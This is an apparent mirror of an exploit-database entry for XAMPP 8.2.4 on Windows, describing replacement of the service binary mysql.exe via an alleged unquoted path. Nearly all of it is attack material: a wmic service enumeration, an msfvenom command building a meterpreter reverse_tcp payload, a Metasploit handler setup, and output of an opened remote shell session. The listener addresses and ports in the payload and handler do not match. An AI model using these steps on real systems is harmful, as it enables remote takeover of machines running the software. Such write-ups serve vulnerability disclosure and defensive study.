扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
# Exploit Title: XAMPP 8.2.4 - Unquoted Path # Date: 07/2023 # Exploit Author: Andrey Stoykov # Version: 8.2.4 # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe # Tested on: Windows Server 2022 # Blog: http://msecureltd.blogspot.com/ Steps to Exploit: 1. Search for unquoted paths 2. Generate meterpreter shell 3. Copy shell to XAMPP directory replacing "mysql.exe" 4. Exploit by double clicking on shell C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysqlAuto // Generate shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe // Setup listener msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 192.168.1.13 msf6 exploit(multi/handler) > set lport 4443 msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp msf6 exploit(multi/handler) > run msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.13:4443 [*] Sending stage (175686 bytes) to 192.168.1.11 [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700 meterpreter > getuid Server username: WIN-5PT4K404NLO\astoykov meterpreter > getpid Current pid: 4724 meterpreter > shell Process 5884 created. Channel 1 created. Microsoft Windows [Version 10.0.20348.1] (c) Microsoft Corporation. All rights reserved. [...] C:\xampp\mysql\bin>dir dir Volume in drive C has no label. Volume Serial Number is 80B5-B405 Directory of C:\xampp\mysql\bin [...] |
体验盒子
